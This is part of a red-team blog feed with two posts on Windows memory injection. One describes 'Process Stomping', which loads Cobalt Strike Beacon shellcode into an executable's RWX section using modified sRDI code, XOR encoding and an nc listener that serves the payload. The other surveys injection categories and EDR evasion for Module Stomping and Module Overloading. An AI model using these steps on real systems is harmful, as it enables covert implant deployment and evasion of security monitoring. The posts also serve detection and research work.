      <td style="text-align: center"><em>PEbear section view for GlassWire executable</em></td>
    </tr>
  </tbody>
</table>

<p>While looking at these interesting characteristics, the <a href="https://www.securityjoes.com/post/process-mockingjay-echoing-rwx-in-userland-to-achieve-code-execution">Mockingjay</a> injection technique immediately came to mind. However, it originally aimed at writing malicious code onto a DLL with RWX permissions, not onto a running process’s section.
So we decided to investigate whether the same Mockingjay principle could also be applied to executables, and we wanted to <strong>load a beacon onto the mapped RWX section itself</strong>, instead of allocating dynamic memory.
This post documents the journey to achieve the aforementioned outcome.</p>

<h3 id="process-stomping">Process Stomping</h3>

<p>One common way of writing malicious code onto a process’ section is to use some variation of the Process Hollowing technique.
As a refresher, Process Hollowing uses the following Windows APIs:</p>

<ol>
  <li><strong>CreateProcess</strong> - setting the Process Creation Flag to CREATE_SUSPENDED (0x00000004) in order to suspend the process’ primary thread.</li>
  <li><strong>ZwUnmapViewOfSection or NtUnmapViewOfSection</strong> - used to unmap the process memory. These two APIs basically release all memory pointed to by a section.</li>
  <li><strong>VirtualAllocEx</strong> - used to allocate new memory for the malicious code to be written.</li>
  <li><strong>WriteProcessMemory</strong> - used to write the malicious code into the target process’ memory space.</li>
  <li><strong>SetThreadContext</strong> - used to point the entry point to the newly written code section.</li>
  <li><strong>ResumeThread</strong> - self-explanatory.</li>
</ol>

<p>Process Hollowing has been pretty popular among malware authors for quite a while, and in the meantime some variations of this technique have been published.
One notable variation is called <a href="https://github.com/hasherezade/process_overwriting">Process Overwriting</a>, and it avoids steps 2 and 3 by writing the malicious PE over the hosting process’ memory space (started in step 1).
This is what an implanted PE looks like in memory (the host process is calc.exe).</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/process_overwriting_hasherezade.png" alt="image-center" title="Process Overwriting" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>Process Overwriting injected PE - taken from hasherezade’s github repository</em></td>
    </tr>
  </tbody>
</table>

<p>This is nearly everything we need, except for the fact that we would need to write some shellcode over a specific section and not a PE over the whole hosting process address space right from the base address.</p>

<p>Quite similarly to the Module Stomping counterpart, our aim in Process Stomping is to write some shellcode onto a specific section of a target process that we started in a suspended state.
For the purpose of this blogpost, the section will be the one with RWX permissions (.themida in the GlassWire executable) so that we can exploit the generous permissions and the likelihood of being in a quite popular false positive situation for GlassWire.</p>

<p>These are the main steps of the ProcessStomping technique:</p>

<ol>
  <li><strong>CreateProcess</strong> - setting the Process Creation Flag to CREATE_SUSPENDED (0x00000004) in order to suspend the process’ primary thread.</li>
  <li><strong>WriteProcessMemory</strong> - used to write the shellcode to the chosen section of the target process.</li>
  <li><strong>SetThreadContext</strong> - used to point the entry point to the newly written code.</li>
  <li><strong>ResumeThread</strong> - self-explanatory.</li>
</ol>

<p>The main difference between the existing ProcessOverwriting technique and ProcessStomping is that the former overwrites the target process’ memory space with a PE, starting from its base address. ProcessStomping, on the other hand, writes shellcode only onto a specific section of the target process.
We can then add a bit more juice by asking ourselves this question:</p>

<p class="notice--warning"><strong>It’s a waste of an opportunity to stomp on an executable with a native RWX section using some shellcode that will then dynamically allocate our payload. Why not let our payload live within the RWX section instead?</strong></p>

<h3 id="using-srdi-to-load-a-beacon-on-an-rwx-process-section">Using sRDI to load a Beacon on an RWX process’ section</h3>

<p>In order to reach our objective and make our payload live in the RWX section of the target process that we want to stomp, we can combine the new <a href="https://www.cobaltstrike.com/blog/cobalt-strike-49-take-me-to-your-loader">Cobalt Strike 4.9 feature</a> of exporting Beacon without a Reflective Loader with the <a href="https://github.com/monoxgas/sRDI">sRDI</a> project, used as a prepended loader for Beacon.
For those unfamiliar with sRDI, it can essentially be seen as a tool that turns dlls into position-independent shellcode, also on the fly.</p>

<p>Once executed, the sRDI shellcode loads the dll using Reflective Injection, and it provides some very useful additions to <a href="https://github.com/stephenfewer/ReflectiveDLLInjection">Stephen Fewer’s original technique</a>, such as access to the shellcode location and argument passing.</p>

<p>Since sRDI uses VirtualAlloc to load the dll and VirtualProtect to finalize sections, we commented out the relevant code blocks and set the base address for the subsequent dll loading to the location of the written shellcode (within the .themida section) plus a chosen offset.
In this way the dll will be loaded onto the section itself rather than into dynamically allocated memory, and the whole section will stay RWX because VirtualProtect won’t be called after the dll’s sections are written.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>	<span class="c1">// Commented VirtualAlloc codeblock</span>
	<span class="cm">/*baseAddress = (ULONG_PTR)pVirtualAlloc(
		(LPVOID)(ntHeaders-&gt;OptionalHeader.ImageBase),
		alignedImageSize,
		MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE
	);

	if (baseAddress == 0) {
		baseAddress = (ULONG_PTR)pVirtualAlloc(
			NULL,
			alignedImageSize,
			MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE
		);
	}*/</span>
	<span class="k">const</span> <span class="kt">size_t</span> <span class="n">offset</span> <span class="o">=</span> <span class="mi">500</span> <span class="o">*</span> <span class="mi">1024</span><span class="p">;</span>  <span class="c1">// 500 kB chosen offset from shellcode location - adapt it to your needs</span>
	<span class="n">baseAddress</span> <span class="o">=</span> <span class="p">(</span><span class="n">ULONG_PTR</span><span class="p">)</span><span class="n">pvShellcodeBase</span> <span class="o">+</span> <span class="n">offset</span><span class="p">;</span>
	
	<span class="p">[...]</span>
	
	<span class="c1">// Commented VirtualProtect codeblock</span>
	<span class="cm">/*
	pVirtualProtect(
		(LPVOID)(baseAddress + sectionHeader-&gt;VirtualAddress),
		sectionHeader-&gt;SizeOfRawData,
		protect, &amp;protect
	);
	*/</span>
	
</code></pre></div></div>

<p>There’s one more thing to address: if we create a process in suspended state and then write something onto an RWX section, the areas of the section that are not written will keep PAGE_EXECUTE_WRITECOPY (WCX on ProcessHacker) permissions, and this will leave a non-homogeneous RWX section.
As per Microsoft documentation:</p>

<p class="notice--info"><strong>PAGE_EXECUTE_WRITECOPY enables execute, read-only, or copy-on-write access to a mapped view of a file mapping object. An attempt to write to a committed copy-on-write page results in a private copy of the page being made for the process. The private page is marked as PAGE_EXECUTE_READWRITE, and the change is written to the new page.</strong></p>

<p>This is what the .themida section looks like after the GlassWire process has been started in suspended state:</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/wcx_glasswire.png" alt="image-center" title="PAGE_EXECUTE_WRITECOPY of .themida section" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>PAGE_EXECUTE_WRITECOPY of .themida section on process start</em></td>
    </tr>
  </tbody>
</table>

<p>If we directly write a shellcode and load a dll payload onto this section this is what we’ll get:</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/wcx_shc_no_overwrite.png" alt="image-center" title="WCX and RWX cocktail" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>WCX and RWX Mojito cocktail</em></td>
    </tr>
  </tbody>
</table>

<p>So to avoid leaving WCX permissions around <strong>we can overwrite the whole section once with dummy data in order to get a clean and contiguous RWX section even after the shellcode gets written and the payload is loaded.</strong></p>
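
<p>To make the copy-on-write behaviour concrete, here is a small model of it. This is a simulation under simplifying assumptions (4 kB pages, a section that starts entirely as PAGE_EXECUTE_WRITECOPY) and it never touches a real process; the function names and the short labels are ours, chosen to resemble what ProcessHacker displays.</p>

```python
from itertools import groupby

PAGE_SIZE = 4096
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80

# Short labels in the style of the ProcessHacker memory view.
LABELS = {0x02: "R", 0x04: "RW", 0x08: "WC", 0x10: "X",
          0x20: "RX", 0x40: "RWX", 0x80: "WCX"}


def simulate_write(page_protections, offset, length):
    """Model a write of `length` bytes at `offset` into a section.

    Every copy-on-write page touched by the write becomes a private
    PAGE_EXECUTE_READWRITE page; untouched pages keep their protection.
    """
    result = list(page_protections)
    if length == 0 or not result:
        return result
    first = offset // PAGE_SIZE
    last = min((offset + length - 1) // PAGE_SIZE, len(result) - 1)
    for index in range(first, last + 1):
        if result[index] == PAGE_EXECUTE_WRITECOPY:
            result[index] = PAGE_EXECUTE_READWRITE
    return result


def summarize(page_protections):
    """Collapse consecutive pages with equal protection into (label, pages) runs."""
    return [
        (LABELS.get(protection, hex(protection)), len(list(run)))
        for protection, run in groupby(page_protections)
    ]
```

<p>In this model, a partial write into an eight-page WCX section yields a mix of WCX and RWX runs, while a write that covers all eight pages yields a single RWX run, which is the effect the dummy-data overwrite is meant to produce.</p>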

<p>For this very same reason of not leaving unnecessary artifacts, we’ll also overwrite the sRDI shellcode blob with dummy data but only after it has been executed and loaded our Beacon in the right RWX section.</p>

<p>The visual representation of what we would like to achieve is depicted in the following figure.</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/procstomping.png" alt="image-center" title="Process Stomping using sRDI to load a payload on an executable's section" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>Process Stomping using sRDI to load a payload on an executable’s section</em></td>
    </tr>
  </tbody>
</table>

<h3 id="putting-it-all-together-srdi--reflective-loaderless-beacon--process-stomping">Putting it all together: sRDI — Reflective-Loaderless Beacon — Process Stomping</h3>

<p>After compiling the sRDI project with our modifications, some post-build actions extract the .text section of the built executable and place it under the bin folder. This works because sRDI code is written as PIC (Position Independent Code), so it can be executed like shellcode.
The next step is to propagate the newly generated PIC into the sRDI tools used for loading or generating the final shellcode blob:</p>

<p><code class="language-plaintext highlighter-rouge">cd C:\Users\naksyn\sRDI\sRDI-master</code></p>

<p><code class="language-plaintext highlighter-rouge">python .\lib\Python\EncodeBlobs.py .\</code></p>

<p>We can now generate a Cobalt Strike Beacon dll without a reflective loader. Be sure to generate an x86 payload; you can double-check the output on the Script Console to make sure the Beacon dll has been generated correctly.</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/script_console_output.png" alt="image-center" title="Beacon dll generated without Reflective Loader" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>Cobalt Strike Script Console output during the generation of a Beacon dll without Reflective Loader</em></td>
    </tr>
  </tbody>
</table>

<p>The payload dll can now be converted into shellcode. sRDI will prepend its bootstrap in the following <a href="https://www.netspi.com/blog/technical/adversary-simulation/srdi-shellcode-reflective-dll-injection/">way</a>:</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/srdi.png" alt="image-center" title="sRDI shellcode blob" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>sRDI shellcode blob structure - image taken from: https://www.netspi.com/blog/technical/adversary-simulation/srdi-shellcode-reflective-dll-injection/</em></td>
    </tr>
  </tbody>
</table>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python ..\Python\ConvertToShellcode.py -b -f "changethedefault" .\noRLx86.dll

</code></pre></div></div>

<p>The shellcode blob can then be XORed with a keyword and downloaded using a simple socket, as implemented in the <a href="https://github.com/naksyn/ProcessStomping/">Process Stomping repo</a>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python xor.py noRLx86.bin noRLx86_enc.bin Bangarang

nc -vv -l -k -p 8000 -w 30 &lt; noRLx86_enc.bin
</code></pre></div></div>
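
<p>For readers unfamiliar with the encoding step, repeating-key XOR can be sketched in a few lines. This is a generic illustration and not necessarily how the <code class="language-plaintext highlighter-rouge">xor.py</code> script in the repo is written; the function name <code class="language-plaintext highlighter-rouge">xor_bytes</code> is ours.</p>

```python
from itertools import cycle


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR every byte of `data` with the key, repeating the key as needed."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(byte ^ key_byte for byte, key_byte in zip(data, cycle(key)))
```

<p>Since XOR is its own inverse, applying the function twice with the same key returns the original bytes, which is why the same keyword works for both encoding and decoding.</p>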

<p>Here’s a video demonstration:</p>

<video width="100%" preload="auto" height="auto" max-width="100px" muted="" controls="">
    <source src="/videos/procstomping.mp4" type="video/mp4" />
</video>

<p>After running Moneta against the injected process we get these results:</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/glasswire_moneta_bangarang.png" alt="image-center" title="Moneta output against the injected process" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>Moneta output against the injected process</em></td>
    </tr>
  </tbody>
</table>

<p>We can see that the .themida section has RWX permissions across its whole size and that there’s a thread started from an offset, because we resumed the main thread at the shellcode address.</p>

<h3 id="outro">Outro</h3>

<p>Executables with RWX sections can be abused similarly to dlls, but there are differences that may offer better detection opportunities.</p>

<p>In fact, the Process Stomping technique requires starting the target process in a suspended state, changing the thread’s entry point, and then resuming the thread to execute the injected shellcode. These are operations that might be considered suspicious if performed in quick succession and could lead to increased scrutiny by some security solutions.</p>

<p>However, as of November 2023, exploiting RWX sections in executables is not a widely abused technique and may allow an attacker to blend in, potentially being dismissed as a false positive, without resorting to the well-known Mockingjay technique applied to DLLs.</p>

<p>By leveraging sRDI or other purposely built custom Reflective Loaders, malicious payloads can be written, loaded, and executed within the available RWX sections. This avoids the need for dynamic memory allocation during both the stages of shellcode and payload execution.</p>]]></content><author><name>Naksyn</name></author><category term="EDR evasion" /><category term="evasion" /><category term="redteam" /><category term="injection" /><category term="cobalt strike" /><category term="process stomping" /><category term="sRDI" /><summary type="html"><![CDATA[Executables with RWX sections can be abused using a variation of a Process Overwriting technique dubbed Process Stomping. Using (a modified) sRDI and leveraging the new features of Cobalt Strike 4.9 has been possible to load beacon in the RWX section itself without the need for a custom UDRL.]]></summary></entry><entry><title type="html">Improving the stealthiness of memory injections techniques</title><link href="https://www.naksyn.com/edr%20evasion/2023/06/01/improving-the-stealthiness-of-memory-injections.html" rel="alternate" type="text/html" title="Improving the stealthiness of memory injections techniques" /><published>2023-06-01T00:00:00-04:00</published><updated>2023-06-03T17:10:20-04:00</updated><id>https://www.naksyn.com/edr%20evasion/2023/06/01/improving-the-stealthiness-of-memory-injections</id><content type="html" xml:base="https://www.naksyn.com/edr%20evasion/2023/06/01/improving-the-stealthiness-of-memory-injections.html"><![CDATA[<p><img src="/images/injection-meme.png" alt="image-center" title="I can haz injection" class="align-center" /></p>

<div id="entry-table-of-contents" class="toc-wrapper">
  <h2 id="toc-toggle" class="no_toc">
  Table of Contents <i class="toc-toggle-icon fas fa-chevron-down"></i>
</h2>
<ol id="markdown-toc">
  <li><a href="#tldr" id="markdown-toc-tldr">TL;DR</a></li>
  <li><a href="#credits" id="markdown-toc-credits">Credits</a></li>
  <li><a href="#intro" id="markdown-toc-intro">Intro</a>    <ol>
      <li><a href="#injection-categories" id="markdown-toc-injection-categories">Injection Categories</a>        <ol>
          <li><a href="#code-injection" id="markdown-toc-code-injection">Code Injection</a></li>
          <li><a href="#pe-injection" id="markdown-toc-pe-injection">PE Injection</a></li>
          <li><a href="#process-manipulation" id="markdown-toc-process-manipulation">Process Manipulation</a></li>
        </ol>
      </li>
    </ol>
  </li>
  <li><a href="#improvement-strategy" id="markdown-toc-improvement-strategy">Improvement Strategy</a>    <ol>
      <li><a href="#moving-parts---injection-technique" id="markdown-toc-moving-parts---injection-technique">Moving Parts - Injection technique</a></li>
      <li><a href="#moving-parts---loader" id="markdown-toc-moving-parts---loader">Moving Parts - Loader</a></li>
      <li><a href="#moving-parts---payload" id="markdown-toc-moving-parts---payload">Moving Parts - Payload</a></li>
      <li><a href="#testing-with-memory-scanners" id="markdown-toc-testing-with-memory-scanners">Testing with memory scanners</a></li>
      <li><a href="#starting-point---pythonmemorymodule" id="markdown-toc-starting-point---pythonmemorymodule">Starting Point - PythonMemoryModule</a></li>
      <li><a href="#module-overloading" id="markdown-toc-module-overloading">Module Overloading</a></li>
      <li><a href="#module-stomping" id="markdown-toc-module-stomping">Module Stomping</a></li>
    </ol>
  </li>
  <li><a href="#module-shifting" id="markdown-toc-module-shifting">Module Shifting</a></li>
  <li><a href="#outro" id="markdown-toc-outro">Outro</a></li>
</ol>

</div>

<p>The topic has been presented at <a href="https://www.x33fcon.com/#!s/DiegoCapriotti.md">x33fcon 2023 Talk - Improving the Stealthiness of Memory Injection Techniques</a> (slide deck is available <a href="https://github.com/naksyn/talks/">here</a>)</p>

<h3 id="tldr">TL;DR</h3>

<p>Injection techniques can be grouped in three main categories:</p>

<ol>
  <li>Code Injection</li>
  <li>PE Injection</li>
  <li>Process Manipulation</li>
</ol>

<p>This post focuses on improving Module Stomping and Module Overloading, both part of the PE injection techniques. They have been chosen as candidates because they avoid dynamic memory allocation and because the cornerstone of both techniques is a common operation (LoadLibrary).</p>

<p>The public implementations of Module Stomping to date get the “Modified Code” IoC from <a href="https://github.com/forrest-orr/moneta">Moneta</a> because the stomped code lives on the hosting dll.</p>

<p>Moneta compares the dll bytes on disk with the in-memory bytes and reports the “Modified Code” IoC when they differ.
This outcome can be avoided by looking at injection techniques from a higher level and thinking about a proper improvement strategy. In fact, there are several moving parts in an injection technique:</p>

<ol>
  <li>the loader</li>
  <li>the injection technique</li>
  <li>the payload</li>
</ol>

<p class="notice--info"><strong>If we can keep the payload functionally independent from the stomped bytes, we can restore the stomped bytes and get rid of the “Modified Code” IoC that some module stomping public implementations bring.</strong></p>

<p>Module Overloading, on the other hand, requires having a PE payload living on a “hosting dll” and we cannot revert the copied bytes back to their original value, otherwise this will impair the payload execution.</p>

<p>However, Module Overloading can be improved by choosing the right section of the hosting dll to write the payload to, and by mimicking some seemingly “strange” behaviour exhibited by Windows and third-party libraries that overwrite parts of their own PE sections, which leads to the “Modified Code” IoC with Moneta.</p>

<p>All these improvements led to a modified Module Stomping and Module Overloading technique that has been dubbed <a href="https://github.com/naksyn/ModuleShifting">Module Shifting</a>.
 To connect these concepts to my previous <a href="https://www.naksyn.com/edr%20evasion/2022/09/01/operating-into-EDRs-blindspot.html">Python research</a> I developed the PoC in Python ctypes such that it can be used dynamically with <a href="https://github.com/naksyn/Pyramid">Pyramid</a>.</p>

<h3 id="credits">Credits</h3>

<p>A huge thank you to the amazing people that published knowledge and tools instrumental to this work:</p>

<ul>
  <li>Aleksandra Doniec (hasherezade) for <a href="https://github.com/hasherezade/module_overloading">Module Overloading</a>, <a href="https://github.com/hasherezade/pe-sieve">PE-Sieve</a>, <a href="https://github.com/hasherezade/pe-bear">PE-Bear</a> and for technical discussions</li>
  <li>Forrest Orr for <a href="https://github.com/forrest-orr/moneta">Moneta</a> and his <a href="https://www.forrest-orr.net/blog">Memory Evasion blog series</a>.</li>
  <li>Kyle Avery for <a href="https://github.com/kyleavery/AceLdr">AceLdr</a></li>
  <li>Fsecure and Bobby Cooke for their public Module Stomping implementation <a href="https://blog.f-secure.com/hiding-malicious-code-with-module-stomping/">(1)</a><a href="https://github.com/boku7/Ninja_UUID_Runner">(2)</a></li>
</ul>

<h3 id="intro">Intro</h3>

<p>The purpose of the post is to improve some injection techniques, so to better understand the process involved we’ll try to answer the following questions:</p>

<ol>
  <li>What’s important to know about an injection, and how can we choose among the myriad of available techniques?</li>
  <li>How can we test the stealthiness and define a benchmark?</li>
  <li>How can we improve an injection technique?</li>
</ol>

<p>In the realm of Offensive Cybersecurity, injection techniques play a pivotal role in various malicious activities.</p>

<p>These techniques involve the insertion of code or payloads into the memory space of legitimate processes, often enabling attackers to execute arbitrary actions covertly.</p>

<p>Among the various techniques, three main categories stand out: Code Injection, PE Injection, and Process Manipulation.</p>

<p>In this post, we will delve into the domain of PE Injection, focusing specifically on two advanced techniques: Module Stomping and Module Overloading.
Module Stomping and Module Overloading are intriguing techniques within the realm of PE Injection due to their ability to sidestep dynamic memory allocation and rely on a fundamental operation known as LoadLibrary.</p>

<p>These techniques, while effective, have been scrutinized for leaving traces that can be detected by advanced security tools like Moneta. Moneta’s detection mechanism involves comparing on-disk DLL bytes with in-memory bytes, effectively flagging modified code as an Indicator of Compromise (IoC). 
This post addresses the challenges posed by these techniques and presents an innovative approach to enhance their stealth and effectiveness.</p>
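
<p>The comparison idea can be sketched as a plain byte diff. This is a deliberately simplified model and not Moneta’s actual implementation: a real scanner also has to account for relocations, section alignment and other legitimate differences between the file and its mapped image. The function name <code class="language-plaintext highlighter-rouge">modified_ranges</code> is ours.</p>

```python
def modified_ranges(on_disk: bytes, in_memory: bytes):
    """Return half-open (start, end) offsets where the two buffers differ.

    Only the common prefix length of the two buffers is compared.
    """
    ranges = []
    start = None
    length = min(len(on_disk), len(in_memory))
    for index in range(length):
        if on_disk[index] != in_memory[index]:
            if start is None:
                start = index          # a new run of modified bytes begins
        elif start is not None:
            ranges.append((start, index))
            start = None
    if start is not None:
        ranges.append((start, length))
    return ranges
```

<p>An empty result means the in-memory bytes match the file, so under this model there would be nothing to flag. Any non-empty result corresponds to what a scanner would surface as modified code.</p>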

<h4 id="injection-categories">Injection Categories</h4>

<p>Since our aim is to improve the stealthiness of injection techniques, we’ll group them into categories, focusing on the IoCs most commonly left by the techniques in the same group.
This is by no means a comprehensive description of every injection technique; the purpose is to provide a high-level overview so that we can better identify promising injection techniques to improve.
If you need a more detailed overview, the <a href="https://www.youtube.com/watch?v=xewv122qxnk">Blackhat 2019 presentation - Process Injection Techniques: Gotta Catch Them All</a> can be beneficial.</p>

<h5 id="code-injection">Code Injection</h5>

<p>Techniques included in this group insert and execute malicious code within a target process’s memory, typically involving dynamic memory allocation.
Some of the most common techniques in this group are:</p>
<ol>
  <li>Classic shellcode injection:
    <ul>
      <li>Allocate memory in the target process</li>
      <li>Write malicious code into the allocated memory</li>
      <li>Create a remote thread or execute via callback functions</li>
    </ul>
  </li>
  <li>APC injection:
    <ul>
      <li>Allocate memory in the target process</li>
      <li>Write malicious code into it</li>
      <li>queue APC</li>
      <li>Resume thread execution</li>
    </ul>
  </li>
  <li>Hook Injection
    <ul>
      <li>Intercept API calls made by the target process</li>
      <li>Redirect the intercepted API calls to the malicious code</li>
    </ul>
  </li>
  <li>Thread Local Storage injection
    <ul>
      <li>modify the target process’ PE header (TLS callback function)</li>
      <li>Execute the injected code as a TLS callback</li>
    </ul>
  </li>
  <li>Exception-Dispatching Injection
    <ul>
      <li>Allocate memory in the target process</li>
      <li>write malicious code into it</li>
      <li>modify the target process’ exception handler</li>
      <li>Trigger an exception in the target process</li>
    </ul>
  </li>
</ol>

<p>The most prevalent IoC for the techniques listed in this group is <strong>dynamic memory allocation, usually made by VirtualAlloc and HeapAlloc API calls, and subsequent changes in memory permissions</strong> (RWX, RW then RX, etc.).
Some techniques also generate technique-specific IoCs, but these are very peculiar and can generally be fingerprinted by security vendors once a technique becomes public. For this reason we are mostly interested in the common IoCs shared by most of the techniques in a group, which gives us a simpler map of an injection category and of the traces its techniques leave behind.</p>
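
<p>From the defender’s point of view, this shared IoC boils down to executable memory that is not backed by an image on disk. The sketch below filters a list of region records for that condition. The record layout (dicts with <code class="language-plaintext highlighter-rouge">base</code>, <code class="language-plaintext highlighter-rouge">type</code> and <code class="language-plaintext highlighter-rouge">protect</code> keys) and the function names are assumptions made for illustration; the constants are the documented Windows values.</p>

```python
# Region types as reported in MEMORY_BASIC_INFORMATION.Type.
MEM_PRIVATE = 0x20000
MEM_MAPPED = 0x40000
MEM_IMAGE = 0x1000000

# PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY
EXECUTABLE_PROTECTIONS = {0x10, 0x20, 0x40, 0x80}


def is_executable(protect):
    """True if the base protection (modifier bits dropped) allows execution."""
    # Modifiers such as PAGE_GUARD (0x100) live above the low byte.
    return (protect & 0xFF) in EXECUTABLE_PROTECTIONS


def private_executable_regions(regions):
    """Return the regions that are both private and executable."""
    return [
        region
        for region in regions
        if region["type"] == MEM_PRIVATE and is_executable(region["protect"])
    ]
```

<p>Legitimate software such as JIT engines also produces private executable memory, so a hit from a filter like this is a lead to investigate rather than a verdict.</p>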

<h5 id="pe-injection">PE Injection</h5>

<p>Techniques included in this group inject a Portable Executable (PE) file, such as a dll or an exe, into the address space of a running process.
Some of the most common techniques in this group are:</p>
<ol>
  <li>Classic dll injection:
    <ul>
      <li>Drop dll on disk</li>
      <li>allocate memory to target process and write malicious dll</li>
      <li>Load dll using LoadLibrary or similar method</li>
    </ul>
  </li>
  <li>Reflective dll injection
    <ul>
      <li>Reflective loader is part of the malicious dll</li>
      <li>The loader loads and maps the malicious dll into the target process without actually calling LoadLibrary or other Windows loading APIs.</li>
      <li>Resolve dependencies and perform relocations</li>
    </ul>
  </li>
  <li>MemoryModule
    <ul>
      <li>similar to reflective dll injection but the loader code is external and not embedded in the dll itself.</li>
      <li>this technique is more flexible since it allows the loading of unmodified dlls.</li>
    </ul>
  </li>
  <li>Module Stomping
    <ul>
      <li>Load a dll into the target process</li>
      <li>Overwrite dll’s section/s with shellcode and execute it</li>
    </ul>
  </li>
  <li>Module Overloading
    <ul>
      <li>Load a dll into the target process</li>
      <li>Overwrite loaded dll memory space with malicious PE</li>
    </ul>
  </li>
</ol>

<p>By injecting a PE, we require that PE to run on the overwritten dll’s bytes, and this would typically mean that the PE is a “final” payload that does not load or execute further stages. On the other hand, by using shellcode (i.e. Module Stomping) an attacker can craft a stealthier approach, with the shellcode loading a final payload in another area of memory.
As we’ll see later in the post, this is a key property that enables some improvements in the injection technique.</p>

<p>Injection techniques in this group mostly leverage, or mimic, a normal dll loading operation such as LoadLibrary. This is a key element that can provide an avenue for attackers to better blend into environments while injecting.</p>

<h5 id="process-manipulation">Process Manipulation</h5>

<p>Techniques included in this group are used to manipulate or modify the memory and execution context of running processes, libraries, or creating new processes with malicious payloads.
Some of the most common techniques in this group are:</p>
<ol>
  <li>Process Hollowing:
    <ul>
      <li>Create process in suspended state</li>
      <li>Replace memory contents with malicious executable</li>
      <li>Resume execution</li>
    </ul>
  </li>
  <li>Process doppelgänging
    <ul>
      <li>Abuse NTFS transactions to load a malicious executable within the context of a legitimate process</li>
    </ul>
  </li>
  <li>Sideloading
    <ul>
      <li>Drop dll on disk</li>
      <li>Abuse windows dll search order or missing dlls to load a malicious dll into a legitimate process</li>
    </ul>
  </li>
  <li>Thread Execution Hijacking
    <ul>
      <li>Suspend a thread in the target process</li>
      <li>Modify instruction pointer to execute malicious code</li>
    </ul>
  </li>
</ol>

<p>The most prevalent IoCs generated by these techniques are <strong>alterations of the context or normal execution flow of a PE</strong> (suspended execution state, abuse of the dll search order).<br />
While this category contains some very powerful techniques, such as sideloading, we might want to first look for techniques that mostly leverage legitimate process operations and do not alter the execution flow, in order to have a better chance of blending into an environment without standing out as odd behaviour.</p>

<h3 id="improvement-strategy">Improvement Strategy</h3>

<p>Before diving into the improvement phase, we should have a proper strategy up our sleeves, since the injection technique is not a single element but part of a <strong>chain whose main moving parts are the injection technique, the loader and the payload</strong>.</p>

<p>The most prevalent IoC for these techniques is that <strong>the PE (dll or exe) or shellcode resides in the memory of a (legitimate) loaded dll</strong>. This leads to a mismatch between the in-memory bytes and the on-disk dll’s bytes, caused by overwriting the loaded dll’s memory space with malicious code.</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/movingparts.png" alt="image-center" title="Moving parts of an injection Technique" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>Moving parts of an injection Technique</em></td>
    </tr>
  </tbody>
</table>

<h4 id="moving-parts---injection-technique">Moving Parts - Injection technique</h4>

<p>The injection technique should not be seen as an isolated element, because its choice can be influenced by the payload or the loader. 
For example, if your payload to be injected is a PE, you’ll basically limit your injection options to the PE injection category.
Similarly, if you choose to use an embedded loader to load a dll, you’re narrowing down to reflective dll injection.</p>

<p>An attacker should choose an injection technique primarily based on operational considerations. Some common drivers might be:</p>
<ul>
  <li>use an injection to emulate a predefined Threat Actor.</li>
  <li>choose an injection that is more likely to blend into an environment</li>
  <li>use an injection that can bypass the security solution the attacker is up against (not necessarily blending into the environment).</li>
</ul>

<p>We are mostly interested in <strong>blending into an environment</strong>, because this can bring the broadest operational depth. For this reason, two key features that the Injection technique should have are:</p>
<ol>
  <li>Avoidance of dynamic memory allocation (via VirtualAlloc or HeapAlloc).</li>
  <li>Usage of a legitimate process operation</li>
</ol>

<p>Looking for injection techniques with these characteristics, we can recall from the introductory overview that Module Stomping and Module Overloading leverage the legitimate LoadLibrary operation to avoid dynamic memory allocation, so that malicious shellcode or a PE can be written over the loaded dll’s memory space.</p>

<p>For this reason we chose to <strong>target Module Stomping and Module Overloading</strong> and look for ways to improve them.</p>

<h4 id="moving-parts---loader">Moving Parts - Loader</h4>

<p>The purpose of the loader is to execute the injection technique itself, eventually loading and executing a payload. There are mainly three types of loaders:</p>

<ol>
  <li><strong>embedded</strong> - the loader is part of the payload (usually a PE). 
 For example, reflective dll injection uses an embedded loader that is coded in the dll and bootstraps the loading process of the dll itself.</li>
  <li><strong>external</strong> - the loader is not part of the payload, it’s typically a standalone PE that gets a shellcode, BOF or PE as input payload and kicks off the injection technique. The payload can be written within a section of the loader itself or can be downloaded/read from disk/pipe.</li>
  <li><strong>interpreted</strong> - this loader is coded in an interpreted language and executed by the code interpreter. This kind of loader does not need a purposely compiled PE to run and can be executed in memory by the interpreter, which needs to be present or dropped on the target.</li>
</ol>

<p>Building upon my previous Python research, our strategy is to adopt an interpreted loader, because we want to avoid generating suspicious PE loaders, which generally have a very short life-span and can be easily fingerprinted, and to leverage the powerful evasion properties that Python brings to the game:</p>
<ol>
  <li>Python embeddable package comes with a signed interpreter that can be dropped on the target</li>
  <li>Coding the loader using Python ctypes allows us to <strong>dynamically execute wrapped C language</strong> code via Python. We can essentially execute any Windows API using Python via the signed interpreter.</li>
  <li>Combining Python with Pyramid allows us to import Python modules in memory and execute complex operations entirely in memory.</li>
